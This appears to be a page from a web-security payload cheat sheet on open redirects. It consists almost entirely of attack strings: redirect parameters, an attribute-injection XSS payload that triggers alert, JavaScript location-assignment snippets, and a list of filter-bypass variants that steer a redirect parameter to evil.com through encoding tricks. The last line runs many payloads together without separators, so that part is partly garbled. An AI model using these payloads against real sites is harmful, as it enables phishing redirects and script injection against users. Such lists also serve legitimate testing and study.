9. Open Redirect
Last updated
https://example.com/redirect?url=https://userpreferredsite.com
https://example.com?redirect_to=https:// %22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f
location="http://exodussec.com"
document.location = "http://google.com"
document.location.href="http://google.com"
window.location.assign("http://google.com")
window['location']['href']="http://google.com"
window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';
?redirect=https://example.com --> ?redirect=https://evil.com?redirect=https://example.com --> ?redirect=//evil.com?redirect=https://example.com --> ?redirect=levil.com?redirect=https://example.com --> ?redirect=https:example.com?redirect=example.com --> ?redirect=example.com%40evil.com?redirect=example.com --> ?redirect=example.comevil.com?redirect=example.com --> ?redirect=example.com%2eevil.com?redirect=example.com --> ?redirect=evil.com?example.com?redirect=example.com --> ?redirect=evil.com%23example.com?redirect=example.com --> ?redirect=example.com/°evil.com?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com?redirect=/ --> ?redirect=/%0d/evil.com